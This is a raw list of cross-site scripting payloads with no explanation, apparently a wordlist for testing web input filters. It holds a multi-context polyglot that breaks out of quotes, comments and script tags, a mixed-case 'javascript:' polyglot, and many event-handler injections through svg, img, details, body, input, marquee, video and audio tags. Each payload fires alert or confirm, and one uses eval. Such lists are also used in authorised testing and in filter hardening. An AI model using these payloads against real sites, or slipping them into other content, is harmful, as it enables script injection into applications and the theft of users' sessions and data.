';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//
<svg/onload=alert(1)//
<img src=x onerror=alert(1)//
"><img src=x onerror=confirm(1)>
'"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id)>
javascript:alert(1)
<details open ontoggle=alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<marquee onstart=alert(1)>
<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>
